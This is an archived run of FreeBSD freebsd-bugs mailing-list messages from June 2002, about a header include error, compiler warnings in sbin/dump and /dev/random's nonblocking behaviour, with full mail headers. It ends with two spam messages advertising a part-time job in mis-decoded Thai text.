08:10:35 -0700 (PDT) Received: from prophecy.dyndns.org (ip-63-121-116-224.new-castle.de.fcc.net [63.121.116.224]) by mx1.FreeBSD.org (Postfix) with ESMTP id D145C43E09 for ; Fri, 28 Jun 2002 08:10:33 -0700 (PDT) (envelope-from apeiron@prophecy.dyndns.org) Received: from prophecy.dyndns.org (prophecy.dyndns.org [127.0.0.1]) by prophecy.dyndns.org (8.12.3/8.12.3) with ESMTP id g5SBBSBh027630 for ; Fri, 28 Jun 2002 11:11:28 GMT (envelope-from apeiron@prophecy.dyndns.org) Received: (from apeiron@localhost) by prophecy.dyndns.org (8.12.3/8.12.3/Submit) id g5SBBSOo027629; Fri, 28 Jun 2002 11:11:28 GMT Subject: Re: Syntax errors in netinet6/in6.h and sys/socket.h From: Christopher Nehren To: freebsd-bugs@FreeBSD.ORG In-Reply-To: <1025262407.272.78.camel@prophecy.dyndns.org> References: <1025262407.272.78.camel@prophecy.dyndns.org> Content-Type: text/plain Content-Transfer-Encoding: 7bit X-Mailer: Ximian Evolution 1.0.5 Date: 28 Jun 2002 11:11:27 +0000 Message-Id: <1025262688.272.83.camel@prophecy.dyndns.org> Mime-Version: 1.0 Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org > >Arrival-Date: Mon Jun 2 14:00:05 PDT 2002 I'm sorry, I forgot to fix the arrival date. >Arrival-Date: Fri Jun 28 11:06:47 EST 2002 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Fri Jun 28 8:26:32 2002 Delivered-To: freebsd-bugs@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id D116D37B401 for ; Fri, 28 Jun 2002 08:26:24 -0700 (PDT) Received: from south.nanolink.com (south.nanolink.com [217.75.134.10]) by mx1.FreeBSD.org (Postfix) with SMTP id 154FE43E06 for ; Fri, 28 Jun 2002 08:26:23 -0700 (PDT) (envelope-from roam@ringlet.net) Received: (qmail 31000 invoked by uid 85); 28 Jun 2002 15:38:08 -0000 Received: from unknown (HELO straylight.ringlet.net) (212.116.140.125) by south.nanolink.com with SMTP; 28 Jun 2002 15:38:05 -0000 Received: (qmail 94316 invoked by uid 1000); 28 Jun 2002 15:24:50 -0000 Date: Fri, 28 Jun 2002 18:24:50 +0300 From: Peter Pentchev To: Christopher Nehren Cc: freebsd-bugs@freebsd.org Subject: Re: Syntax errors in netinet6/in6.h and sys/socket.h Message-ID: <20020628152450.GA93540@straylight.oblivion.bg> Mail-Followup-To: Christopher Nehren , freebsd-bugs@freebsd.org References: <1025262407.272.78.camel@prophecy.dyndns.org> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-sha1; protocol="application/pgp-signature"; boundary="6c2NcOVqGQ03X4Wi" Content-Disposition: inline In-Reply-To: <1025262407.272.78.camel@prophecy.dyndns.org> User-Agent: Mutt/1.5.1i X-Virus-Scanned: by Nik's Monitoring Daemon (AMaViS perl-11d ) Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --6c2NcOVqGQ03X4Wi Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Fri, Jun 28, 2002 at 11:06:47AM +0000, Christopher Nehren wrote: > >Synopsis: 4.6R has errors in net header files > >Confidential: no > >Severity: serious > >Priority: I'm guessing high, lots of stuff uses socket.h, no? > >Responsible: freebsd-bugs > >State: open > >Class: sw-bug > >Submitter-Id: current-users > >Arrival-Date: Mon Jun 2 14:00:05 PDT 2002 > >Last-Modified: > >Originator: Chris Nehren This is not exactly a properly filed problem report; did you use the send-pr(1) utility and then change the mail recipient address (it should have been freebsd-gnats-submit@FreeBSD.org), or did you just mail out the template to freebsd-bugs@FreeBSD.org? :) The proper way to file a FreeBSD problem report would be to either use the send-pr(1) utility on your FreeBSD system, or use the GNATS web interface at http://www.FreeBSD.org/cgi/send-pr.cgi > >Environment: > FreeBSD prophecy.dyndns.org 4.6-RELEASE FreeBSD 4.6-RELEASE #0: Tue Jun > 25 11:28:04 GMT 2002 =20 > root@prophecy.dyndns.org:/usr/obj/usr/src/sys/PROPHECY i386 >=20 >=20 > >Description: > Including and produces syntax errors even > with an empty program >=20 > >How-To-Repeat: >=20 > Compile the C program that follows: > #include > #include =20 > /* can't include directly */ > int main() > { > return 0; > } Such an 'empty program' has no need for including ; what exactly are you trying to make your program do? :) If you need to use the socket(2), bind(2), listen(2), etc, system calls, you might want to take a look at either their manual pages, where the header file is listed as a prerequisite, or at some sample code; if you want to write TCP/IP networking applications using those system calls and some constants defined in the file, you would do best to look at some sample apps to see what other header files you need to include. Generally, you would need , , , quite possibly also and ; however, is indeed listed as a prerequisite in the manual page of each and every system call used in TCP/IP networking (and, for that matter, any kind of socket networking). G'luck, Peter --=20 Peter Pentchev roam@ringlet.net roam@FreeBSD.org PGP key: http://people.FreeBSD.org/~roam/roam.key.asc Key fingerprint FDBA FD79 C26F 3C51 C95E DF9E ED18 B68D 1619 4553 What would this sentence be like if pi were 3? --6c2NcOVqGQ03X4Wi Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.7 (FreeBSD) iD8DBQE9HH/C7Ri2jRYZRVMRAm4tAKCr8sI+6vsdRYF28oG7elwg1zNMfgCdGLcH k7EJEJOMSFp+ZBBf65Jdkm8= =mSry -----END PGP SIGNATURE----- --6c2NcOVqGQ03X4Wi-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Fri Jun 28 8:32: 6 2002 Delivered-To: freebsd-bugs@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id E6C2437B401 for ; Fri, 28 Jun 2002 08:32:02 -0700 (PDT) Received: from south.nanolink.com (south.nanolink.com [217.75.134.10]) by mx1.FreeBSD.org (Postfix) with SMTP id 68BCC43E06 for ; Fri, 28 Jun 2002 08:32:00 -0700 (PDT) (envelope-from roam@ringlet.net) Received: (qmail 31043 invoked by uid 85); 28 Jun 2002 15:43:56 -0000 Received: from unknown (HELO straylight.ringlet.net) (212.116.140.125) by south.nanolink.com with SMTP; 28 Jun 2002 15:43:54 -0000 Received: (qmail 94352 invoked by uid 1000); 28 Jun 2002 15:30:39 -0000 Date: Fri, 28 Jun 2002 18:30:39 +0300 From: Peter Pentchev To: Christopher Nehren Cc: freebsd-bugs@FreeBSD.ORG Subject: Re: Syntax errors in netinet6/in6.h and sys/socket.h Message-ID: <20020628153039.GB93540@straylight.oblivion.bg> Mail-Followup-To: Christopher Nehren , freebsd-bugs@FreeBSD.ORG References: <1025262407.272.78.camel@prophecy.dyndns.org> <1025262688.272.83.camel@prophecy.dyndns.org> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-sha1; protocol="application/pgp-signature"; boundary="Pd0ReVV5GZGQvF3a" Content-Disposition: inline In-Reply-To: <1025262688.272.83.camel@prophecy.dyndns.org> User-Agent: Mutt/1.5.1i X-Virus-Scanned: by Nik's Monitoring Daemon (AMaViS perl-11d ) Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --Pd0ReVV5GZGQvF3a Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Fri, Jun 28, 2002 at 11:11:27AM +0000, Christopher Nehren wrote: > > >Arrival-Date: Mon Jun 2 14:00:05 PDT 2002 > I'm sorry, I forgot to fix the arrival date. > >Arrival-Date: Fri Jun 28 11:06:47 EST 2002 As I noted in a previous message, you would not need to "fix" anything in a bug report submitted properly through either the send-pr(1) utility or the FreeBSD GNATS web interface. Both of those methods are descibed on the FreeBSD website at http://www.FreeBSD.org/send-pr.html (linked to from the main page as 'Send a Bug Report') and at http://www.FreeBSD.org/support.html#gnats (linked to form the main page as 'More...' in the 'Bug Reports' section). G'luck, Peter --=20 Peter Pentchev roam@ringlet.net roam@FreeBSD.org PGP key: http://people.FreeBSD.org/~roam/roam.key.asc Key fingerprint FDBA FD79 C26F 3C51 C95E DF9E ED18 B68D 1619 4553 =2Esiht ekil ti gnidaer eb d'uoy ,werbeH ni erew ecnetnes siht fI --Pd0ReVV5GZGQvF3a Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.7 (FreeBSD) iD8DBQE9HIEf7Ri2jRYZRVMRAvmyAKCW+1F1uO8Qzwxyiz9rizT/ug4WdACfVgxa OQni4qzaLUQzjJJTJx2Mv50= =Q47o -----END PGP SIGNATURE----- --Pd0ReVV5GZGQvF3a-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Fri Jun 28 8:34: 6 2002 Delivered-To: freebsd-bugs@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 4EC8F37B400 for ; Fri, 28 Jun 2002 08:33:59 -0700 (PDT) Received: from south.nanolink.com (south.nanolink.com [217.75.134.10]) by mx1.FreeBSD.org (Postfix) with SMTP id D98E043E06 for ; Fri, 28 Jun 2002 08:33:56 -0700 (PDT) (envelope-from roam@ringlet.net) Received: (qmail 31067 invoked by uid 85); 28 Jun 2002 15:45:49 -0000 Received: from unknown (HELO straylight.ringlet.net) (212.116.140.125) by south.nanolink.com with SMTP; 28 Jun 2002 15:45:46 -0000 Received: (qmail 94396 invoked by uid 1000); 28 Jun 2002 15:32:29 -0000 Date: Fri, 28 Jun 2002 18:32:28 +0300 From: Peter Pentchev To: Christopher Nehren Cc: freebsd-bugs@FreeBSD.ORG Subject: Re: Syntax errors in netinet6/in6.h and sys/socket.h Message-ID: <20020628153228.GC93540@straylight.oblivion.bg> Mail-Followup-To: Christopher Nehren , freebsd-bugs@FreeBSD.ORG References: <1025262407.272.78.camel@prophecy.dyndns.org> <1025262688.272.83.camel@prophecy.dyndns.org> <20020628153039.GB93540@straylight.oblivion.bg> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-sha1; protocol="application/pgp-signature"; boundary="H8ygTp4AXg6deix2" Content-Disposition: inline In-Reply-To: <20020628153039.GB93540@straylight.oblivion.bg> User-Agent: Mutt/1.5.1i X-Virus-Scanned: by Nik's Monitoring Daemon (AMaViS perl-11d ) Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --H8ygTp4AXg6deix2 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Fri, Jun 28, 2002 at 06:30:39PM +0300, Peter Pentchev wrote: > On Fri, Jun 28, 2002 at 11:11:27AM +0000, Christopher Nehren wrote: > > > >Arrival-Date: Mon Jun 2 14:00:05 PDT 2002 > > I'm sorry, I forgot to fix the arrival date. > > >Arrival-Date: Fri Jun 28 11:06:47 EST 2002 >=20 > As I noted in a previous message, you would not need to "fix" anything > in a bug report submitted properly through either the send-pr(1) utility > or the FreeBSD GNATS web interface. >=20 > Both of those methods are descibed on the FreeBSD website at > http://www.FreeBSD.org/send-pr.html (linked to from the main page as > 'Send a Bug Report') and at http://www.FreeBSD.org/support.html#gnats > (linked to form the main page as 'More...' in the 'Bug Reports' ^^^^ 'from', of course.. > section). G'luck, Peter --=20 Peter Pentchev roam@ringlet.net roam@FreeBSD.org PGP key: http://people.FreeBSD.org/~roam/roam.key.asc Key fingerprint FDBA FD79 C26F 3C51 C95E DF9E ED18 B68D 1619 4553 No language can express every thought unambiguously, least of all this one. --H8ygTp4AXg6deix2 Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.7 (FreeBSD) iD8DBQE9HIGM7Ri2jRYZRVMRAq3UAJ9EeYwVo5caTpxrOtuF7+2EM/KuWQCeOuKC u22g9nEUi0jPC9Hgs34Rfzc= =bpdt -----END PGP SIGNATURE----- --H8ygTp4AXg6deix2-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Fri Jun 28 9:47:12 2002 Delivered-To: freebsd-bugs@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 1184F37B405 for ; Fri, 28 Jun 2002 09:47:10 -0700 (PDT) Received: from prophecy.dyndns.org (ip-63-121-116-224.new-castle.de.fcc.net [63.121.116.224]) by mx1.FreeBSD.org (Postfix) with ESMTP id 3CEBB43E09 for ; Fri, 28 Jun 2002 09:47:08 -0700 (PDT) (envelope-from apeiron@prophecy.dyndns.org) Received: from prophecy.dyndns.org (prophecy.dyndns.org [127.0.0.1]) by prophecy.dyndns.org (8.12.3/8.12.3) with ESMTP id g5SCm1Bh029169; Fri, 28 Jun 2002 12:48:01 GMT (envelope-from apeiron@prophecy.dyndns.org) Received: (from apeiron@localhost) by prophecy.dyndns.org (8.12.3/8.12.3/Submit) id g5SClrVR029168; Fri, 28 Jun 2002 12:47:53 GMT Subject: Re: Syntax errors in netinet6/in6.h and sys/socket.h From: Christopher Nehren To: Peter Pentchev Cc: freebsd-bugs@freebsd.org In-Reply-To: <20020628152450.GA93540@straylight.oblivion.bg> References: <1025262407.272.78.camel@prophecy.dyndns.org> <20020628152450.GA93540@straylight.oblivion.bg> Content-Type: text/plain Content-Transfer-Encoding: 7bit X-Mailer: Ximian Evolution 1.0.5 Date: 28 Jun 2002 12:47:52 +0000 Message-Id: <1025268472.272.92.camel@prophecy.dyndns.org> Mime-Version: 1.0 Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org > This is not exactly a properly filed problem report; did you use > the send-pr(1) utility and then change the mail recipient address > (it should have been freebsd-gnats-submit@FreeBSD.org), or did you just > mail out the template to freebsd-bugs@FreeBSD.org? :) > > The proper way to file a FreeBSD problem report would be to either use > the send-pr(1) utility on your FreeBSD system, or use the GNATS web > interface at http://www.FreeBSD.org/cgi/send-pr.cgi My apologies, I shall do that next time. > Such an 'empty program' has no need for including ; what > exactly are you trying to make your program do? :) If you need to use > the socket(2), bind(2), listen(2), etc, system calls, you might want to > take a look at either their manual pages, where the header > file is listed as a prerequisite, or at some sample code; if you want to > write TCP/IP networking applications using those system calls and some > constants defined in the file, you would do best to look > at some sample apps to see what other header files you need to include. > Generally, you would need , , , > quite possibly also and ; however, > is indeed listed as a prerequisite in the manual page of each and every > system call used in TCP/IP networking (and, for that matter, any kind of > socket networking). The purpose of the "empty program" was to demonstrate the syntax errors in a program I was compiling that was part of GNOME2. I assumed (I know) that the programmer of gnome2-vfs-extras knew to include all of the required files. It just seemed to me that everything _should_ have been right; I hadn't thought to check the source to the module I was compiling. Adding: #include fixed the problem. I guess this is an issue for gnome2-vfs-extras, and not FreeBSD. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Fri Jun 28 10: 3:26 2002 Delivered-To: freebsd-bugs@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id BF87B37B401 for ; Fri, 28 Jun 2002 10:03:16 -0700 (PDT) Received: from odin.ac.hmc.edu (Odin.AC.HMC.Edu [134.173.32.75]) by mx1.FreeBSD.org (Postfix) with ESMTP id 3B70E43E06 for ; Fri, 28 Jun 2002 10:03:16 -0700 (PDT) (envelope-from brdavis@odin.ac.hmc.edu) Received: from odin.ac.hmc.edu (IDENT:brdavis@localhost.localdomain [127.0.0.1]) by odin.ac.hmc.edu (8.12.3/8.12.3) with ESMTP id g5SH3Eri028639; Fri, 28 Jun 2002 10:03:14 -0700 Received: (from brdavis@localhost) by odin.ac.hmc.edu (8.12.3/8.12.3/Submit) id g5SH37SD028630; Fri, 28 Jun 2002 10:03:07 -0700 Date: Fri, 28 Jun 2002 10:03:07 -0700 From: Brooks Davis To: Andy Farkas Cc: Brooks Davis , freebsd-bugs@FreeBSD.ORG, Dan Lukes Subject: Re: bin/39868: cleaning sbin/dump code from warnings Message-ID: <20020628100307.A26852@Odin.AC.HMC.Edu> References: <200206270110.g5R1A4QO001789@freefall.freebsd.org> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="6c2NcOVqGQ03X4Wi" Content-Disposition: inline User-Agent: Mutt/1.2.5.1i In-Reply-To: ; from andyf@speednet.com.au on Fri, Jun 28, 2002 at 03:54:31PM +1000 X-Virus-Scanned: by amavisd-milter (http://amavis.org/) on odin.ac.hmc.edu Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --6c2NcOVqGQ03X4Wi Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Fri, Jun 28, 2002 at 03:54:31PM +1000, Andy Farkas wrote: > On Wed, 26 Jun 2002, Brooks Davis wrote: >=20 > > Thank you for submitting patches to address the warnings in this code. >=20 > I think what Dan is doing is A Good Thing (tm). Absolutly. > > Unfortunatly, you had really bad timing and the code in -current has > > changed significantly due to the changes required for UFS2 support. > > This means it is unlikely these patches will apply to -current. They > > will apply to -stable, but I'm not sure what we want to do about that > > given that there won't be significantly development of file system > > changes in -stable. >=20 > Surely the work Dan has put into these PR's makes it extremely easy for a > committer to review the patches, then commit. >=20 > Even though RELENG_4 is nearing its end of life and developer and > committer time is precious, perhaps if the user community sees results > from their work, more contributions will be made. I was simply pointing out that due to timing problems that are no one's fault, it's going to be hard to use these patches in a timely manner. We don't commit directly to stable without significant cause and in most cases fixing warnings in programs that work isn't. Certaintly I would encourage anyone doing warnings fixes in current to merge these patches as appropriate to both current and stable. For that matter, maybe Dan want's go really get his hands dirty and try current once DP2 comes out in July. It's shaping up pretty nicly IMO. -- Brooks --=20 Any statement of the form "X is the one, true Y" is FALSE. PGP fingerprint 655D 519C 26A7 82E7 2529 9BF0 5D8E 8BE9 F238 1AD4 --6c2NcOVqGQ03X4Wi Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (GNU/Linux) Comment: For info see http://www.gnupg.org iD8DBQE9HJbKXY6L6fI4GtQRAkLTAJ9gZAMaLaV9HxXVzBHn8vR6FODAkgCfb/WQ k9b4Xcukwn8CuUYdEuiGv8Y= =3W6t -----END PGP SIGNATURE----- --6c2NcOVqGQ03X4Wi-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Fri Jun 28 10: 5:41 2002 Delivered-To: freebsd-bugs@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 4715037B400 for ; Fri, 28 Jun 2002 10:05:20 -0700 (PDT) Received: from odin.ac.hmc.edu (Odin.AC.HMC.Edu [134.173.32.75]) by mx1.FreeBSD.org (Postfix) with ESMTP id 70A0C43E09 for ; Fri, 28 Jun 2002 10:05:18 -0700 (PDT) (envelope-from brdavis@odin.ac.hmc.edu) Received: from odin.ac.hmc.edu (IDENT:brdavis@localhost.localdomain [127.0.0.1]) by odin.ac.hmc.edu (8.12.3/8.12.3) with ESMTP id g5SH5Gri028867; Fri, 28 Jun 2002 10:05:16 -0700 Received: (from brdavis@localhost) by odin.ac.hmc.edu (8.12.3/8.12.3/Submit) id g5SH5G3d028866; Fri, 28 Jun 2002 10:05:16 -0700 Date: Fri, 28 Jun 2002 10:05:16 -0700 From: Brooks Davis To: Dan Lukes Cc: freebsd-bugs@FreeBSD.ORG Subject: Re: bin/39868: cleaning sbin/dump code from warnings Message-ID: <20020628100516.B26852@Odin.AC.HMC.Edu> References: <200206271050.g5RAo46R097264@freefall.freebsd.org> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="Pd0ReVV5GZGQvF3a" Content-Disposition: inline User-Agent: Mutt/1.2.5.1i In-Reply-To: <200206271050.g5RAo46R097264@freefall.freebsd.org>; from dan@obluda.cz on Thu, Jun 27, 2002 at 03:50:04AM -0700 X-Virus-Scanned: by amavisd-milter (http://amavis.org/) on odin.ac.hmc.edu Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --Pd0ReVV5GZGQvF3a Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Thu, Jun 27, 2002 at 03:50:04AM -0700, Dan Lukes wrote: > The following reply was made to PR bin/39868; it has been noted by GNATS. >=20 > But the > sbin/dump/traverse.c: In function `bread': > 629: warning: int format, pointer arg (arg 3) > disk is (char *) > =20 > is the only error with real impact as the error message > =20 > ---------------- > msg("More than %d block read errors from %d\n", > BREADEMAX, disk); > ---------------- > =20 > may be confusing (because disk is (char *)) for user. I've been meaning to do a warnings sweep through dump anyway so I'll take a look at this one. It's definatly a real bug. -- Brooks --=20 Any statement of the form "X is the one, true Y" is FALSE. PGP fingerprint 655D 519C 26A7 82E7 2529 9BF0 5D8E 8BE9 F238 1AD4 --Pd0ReVV5GZGQvF3a Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (GNU/Linux) Comment: For info see http://www.gnupg.org iD8DBQE9HJdLXY6L6fI4GtQRApXVAJ0R2eFTGSkFFkANtzPzQ3HiMoKZ0wCg2xbV BECKlDv8ek7IJezKlRpMgng= =HSl/ -----END PGP SIGNATURE----- --Pd0ReVV5GZGQvF3a-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Fri Jun 28 11:10:15 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id A2A2E37B400 for ; Fri, 28 Jun 2002 11:10:04 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id 6327D43E06 for ; Fri, 28 Jun 2002 11:10:04 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: from freefall.freebsd.org (gnats@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g5SIA4JU089705 for ; Fri, 28 Jun 2002 11:10:04 -0700 (PDT) (envelope-from gnats@freefall.freebsd.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g5SIA4d0089704; Fri, 28 Jun 2002 11:10:04 -0700 (PDT) Date: Fri, 28 Jun 2002 11:10:04 -0700 (PDT) Message-Id: <200206281810.g5SIA4d0089704@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: gson@nominum.com (Andreas Gustafsson) Subject: Re: kern/38527: /dev/random does not obey O_NONBLOCK flag Reply-To: gson@nominum.com (Andreas Gustafsson) Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org The following reply was made to PR kern/38527; it has been noted by GNATS. From: gson@nominum.com (Andreas Gustafsson) To: Nate Lawson Cc: freebsd-gnats-submit@FreeBSD.org Subject: Re: kern/38527: /dev/random does not obey O_NONBLOCK flag Date: Fri, 28 Jun 2002 11:02:45 -0700 (PDT) Nate Lawson writes: > This behavior is intentional and was changed some time ago. If you want > to block on /dev/random waiting for bytes to be available, use > select/poll. You've got to be kidding. Why would you intentionally implement a behaviour that is a) gratuitously different from every other implementation of /dev/random b) gratuitously different from every other character device in the history of Unix by being nonblocking by default, c) not even correctly nonblocking, because when no data is available, read() on a nonblocking device is supposed to return -1 with errno=EWOULDBLOCK, but in the case of /dev/random, read() returns 0, and d) undocumented? -- Andreas Gustafsson, gson@nominum.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Fri Jun 28 11:38:22 2002 Delivered-To: freebsd-bugs@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 5E41B37B40A for ; Fri, 28 Jun 2002 11:38:07 -0700 (PDT) Received: from mail3.ksc.th.com (mail3.ksc.th.com [203.155.0.234]) by mx1.FreeBSD.org (Postfix) with ESMTP id D399843E20 for ; Fri, 28 Jun 2002 11:37:44 -0700 (PDT) (envelope-from easytoberich01@yahoo.com) Received: from ksc.th.com ([203.107.246.47]) by mail3.ksc.th.com (8.12.1/8.12.0) with SMTP id g5SIYRe0007846 for ; Sat, 29 Jun 2002 01:37:42 +0700 Message-Id: <200206281837.g5SIYRe0007846@mail3.ksc.th.com> Date: Sat, 29 Jun 2002 01:39:46 To: freebsd-bugs@FreeBSD.org From: easytoberich01@yahoo.com (international e-business) Subject: йскця╨╪ыИ╥уХ╣Им╖║рцБм║рйЦ╧║рцЮ╩еуХб╧А╩е╖╙угт╣ Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org !!!!! Part-Time Job!! йскця╨╧я║Юцуб╧ ╧я║хж║ир Аеп╪ыИ╥с╖р╧╩цп╗с ╓ьЁ╣Им╖║рц╖р╧А╨╨╧уИ╨Ир╖Дка┘?? -╖р╧ parttime ╥с╖р╧╥уХ╨Ир╧Д╢И ╤Ир╓ьЁЦ╙И Internet Ю╩Г╧ -╥с╖р╧Ю╬уб╖гя╧еп 2-3 ╙а. -црбД╢И 5,000 √ 15,000 ╨р╥ ╤Ир╓ьЁЮ╩Г╧╓╧к╧жХ╖╥уХ╥с╖р╧╩цп╗скцвмбя╖ДаХау╖р╧╥с ╧я║хж║ир╥уХ║сея╖хж║ирмбыХ ╪ыИгХр╖╖р╧ кцвм╪ыИ╥уХбя╖╬мауЮгергХр╖╗р║╖р╧╩цп╗с ау╓ьЁйа╨я╣тЮ╨вИм╖╣И╧╢я╖╧уИ 1. ау╥ях╧╓╣т╥уХ╢у 2. ╬цИма╥уХ╗пЮцуб╧цыИ Ю╧вХм╖╗р║Ю╩Г╧цп╨╨ЦкаХ╗ж╖╣Им╖ЦкИау║рцм╨цаЦкИ╣ра╓граЮкарпйа 3. ╣Им╖║рц╥уХ╗п╥с╖р╧мбХр╖╗цт╖╗я╖ мбр║╥уХ╗пЮ╩еуХб╧╟р╧п╥р╖║рцЮ╖т╧╒м╖╣╧Юм╖ Аепмбр║ауцрбД╢И╗р║║рц╥с╖р╧╣ц╖╧уИ╗цт╖Ф ╥ь║мбХр╖Ю╩Г╧Д╩Д╢И Ц╧ http://www.geocities.com/getchances2000/ мбХр !┘┘┘┘┘.. Ю╩Г╧А╓ХЮ╬уб╖╓╧╥уХ╧яХ╖цмБм║рй To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Fri Jun 28 12:17:19 2002 Delivered-To: freebsd-bugs@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id DF90A37B406 for ; Fri, 28 Jun 2002 12:17:06 -0700 (PDT) Received: from mail3.ksc.th.com (mail3.ksc.th.com [203.155.0.234]) by mx1.FreeBSD.org (Postfix) with ESMTP id 2D61F43E0F for ; Fri, 28 Jun 2002 12:17:05 -0700 (PDT) (envelope-from easytoberich01@yahoo.com) Received: from ksc.th.com ([203.107.246.47]) by mail3.ksc.th.com (8.12.1/8.12.0) with SMTP id g5SIYR70007846 for ; Sat, 29 Jun 2002 02:17:03 +0700 Message-Id: <200206281917.g5SIYR70007846@mail3.ksc.th.com> Date: Sat, 29 Jun 2002 02:19:06 To: bugs@FreeBSD.org From: easytoberich01@yahoo.com (international e-business) Subject: йскця╨╪ыИ╥уХ╣Им╖║рцБм║рйЦ╧║рцЮ╩еуХб╧А╩е╖╙угт╣ Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org !!!!! Part-Time Job!! йскця╨╧я║Юцуб╧ ╧я║хж║ир Аеп╪ыИ╥с╖р╧╩цп╗с ╓ьЁ╣Им╖║рц╖р╧А╨╨╧уИ╨Ир╖Дка┘?? -╖р╧ parttime ╥с╖р╧╥уХ╨Ир╧Д╢И ╤Ир╓ьЁЦ╙И Internet Ю╩Г╧ -╥с╖р╧Ю╬уб╖гя╧еп 2-3 ╙а. -црбД╢И 5,000 √ 15,000 ╨р╥ 